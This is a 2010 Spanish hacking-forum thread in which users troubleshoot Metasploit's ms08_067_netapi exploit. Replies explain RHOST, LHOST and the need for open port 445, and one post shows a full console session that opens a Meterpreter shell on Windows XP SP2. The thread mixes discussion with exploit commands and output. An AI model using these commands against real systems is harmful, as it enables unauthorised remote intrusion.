Autor
|
Tema: Ayuda Nmap y Metasploit (Leído 28,783 veces)
|
Shell Root
|
Pwned, como bien lo dijistes PORT STATE SERVICE 6551/tcp open bittorrent-tracker Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445Verificalo en el RPORT
|
|
|
En línea
|
Te vendería mi talento por poder dormir tranquilo.
|
|
|
Masita
Desconectado
Mensajes: 120
pythoneando
|
No soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST. No el RHOST es el HostRemoto, se indica al momento de escoger el PAYLOAD y/o exploit. El PAYLOAD es la accion a realizarse si se ejecuta el Exploit Correctamente. Se que el payload es la accion y el rhost el host remoto si lo sabia, pero creia que tenias que declararlos uno despues del otro. Ya que dependiendo del payload tienes unas "options" u otras. Ademas no me habia fijado en el error en concreto mea culpa.
|
|
« Última modificación: 7 Enero 2010, 18:52 pm por Masita »
|
En línea
|
En el cielo estan suspendidas las palabras que cantamos en nuestros sueños....
|
|
|
rockernault
Desconectado
Mensajes: 2.046
Linux User!!!
|
cpu2 YOU'VE BEEN PWNED
|
|
|
En línea
|
|
|
|
xv0
Desconectado
Mensajes: 1.027
|
Gracais a todos por ayudarme y contestar tan rapido
Shell Root Nada e visto los 2 videos los e probado y nada me dice lo mismo en el segunbdo video que haces un payload windows/shell/reverse_tcp, cuando metes el RHOST 192.168.0.3 es tu ip? por que yo puse la mia y nada no funciona alguna idea?
rokernault
Como le exploto una vulnerabilidad de samba en un puerto de bittorrent a eso de samba me suena a algo de linux aa vaya imagen as puesto tio jeje.
Un saludo
|
|
|
En línea
|
|
|
|
Shell Root
|
cpu2, a ver, 1. RHOST= Host_Remoto; LHOST= Host_Local RPORT= Puerto_Remoto; LPORT= Puerto_Local 2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque? PORT STATE SERVICE 6551/tcp open bittorrent-tracker Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose... Saludos!
|
|
« Última modificación: 7 Enero 2010, 19:27 pm por Shell Root »
|
En línea
|
Te vendería mi talento por poder dormir tranquilo.
|
|
|
rockernault
Desconectado
Mensajes: 2.046
Linux User!!!
|
|
|
|
En línea
|
|
|
|
xv0
Desconectado
Mensajes: 1.027
|
Shell Root mira es lo que me sale ami
use exploit/windows/smb/ms08_067_netapi <------------- ningun problema
show options
Module options: Name Current Setting Required Description --------- ------------------ ------------ ------------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting
Vale me sale eso por lo que e visto en el video todo igual
set RHOST 192.168.1.32
set payload windows/shell/bind_tcp
show options
Module options: Name Current Setting Required Description --------- ------------------ ------------ ------------- RHOST 192.168.132 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/bind_tcp): Name Current Setting Required Description --------- ------------------ ------------ ------------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port LHOST 192.168.1.32 no The target address
Exploit target: Id Name -- ---- 0 Automatic Targeting
eso sale
exploit
* Started bind handler [-] Exploit failed: The host (192.168.1.32:445) was unreachable. * Exploit completed, but no session was created.
eso es mi caso alguna idea creo que lo ago bien? Un saludo
|
|
|
En línea
|
|
|
|
Shell Root
|
1. Ingresando RHOST y LHOST iguales, WTF! No tiene problema, pero jajaja es raro, prefiero crearme tan siquiera una Maquina Virtual. :·P 2. Importante: La maquina a la que deseas ingresar con el exploit, no es vulnerable a ese exploit... xD 2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque? PORT STATE SERVICE 6551/tcp open bittorrent-tracker Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose... Saludos! Saludos!
|
|
« Última modificación: 7 Enero 2010, 20:09 pm por Shell Root »
|
En línea
|
Te vendería mi talento por poder dormir tranquilo.
|
|
|
rockernault
Desconectado
Mensajes: 2.046
Linux User!!!
|
Module options: Name Current Setting Required Description --------- ------------------ ------------ ------------- RHOST 192.168.132 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/bind_tcp): Name Current Setting Required Description --------- ------------------ ------------ ------------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port LHOST 192.168.1.32 no The target address mira bien las ip.. da igual, la maquina no es vulnerable
|
|
|
En línea
|
|
|
|
Shell Root
|
mira bien las ip.. No tiene nada que ver, mira. | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ metasploit v3.3.2-release [core:3.3 api:1.0] + -- --=[ 462 exploits - 219 auxiliary + -- --=[ 192 payloads - 22 encoders - 8 nops =[ svn r7808 updated 28 days hago (2009.12.10) msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set RHOST 192.168.0.2RHOST => 192.168.0.2 msf exploit(ms08_067_netapi) > set LHOST 192.168.0.2LHOST => 192.168.0.2 msf exploit(ms08_067_netapi) > exploit - Started reverse handler on port 4444
- Automatically detecting the target...
- Fingerprint: Windows XP Service Pack 2 - lang:Spanish
- Selected Target: Windows XP SP2 Spanish (NX)
- Triggering the vulnerability...
- Sending stage (723456 bytes)
- Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.2:9121)[/b]
meterpreter >
Saludos!
|
|
|
En línea
|
Te vendería mi talento por poder dormir tranquilo.
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Nmap, Nessus y Metasploit
Dudas Generales
|
El Gnomo
|
1
|
4,559
|
10 Enero 2011, 01:27 am
por Shell Root
|
|
|
Nmap, Nessus y Metasploit
Hacking
|
El Gnomo
|
2
|
5,472
|
13 Enero 2011, 23:26 pm
por El Gnomo
|
|
|
Ayuda urgente con los NSE de nmap-6.00
Hacking
|
D4rck4r
|
2
|
2,608
|
11 Junio 2012, 02:59 am
por D4rck4r
|
|
|
¿Alguien me puede dejar algún manual de nmap y de metasploit?
Seguridad
|
robertito_prado
|
3
|
3,202
|
23 Julio 2012, 03:33 am
por robertito_prado
|
|
|
Como agregar nmap 6.01 a el metasploit y armitage
Seguridad
|
D4rck4r
|
0
|
2,124
|
10 Agosto 2012, 20:38 pm
por D4rck4r
|
|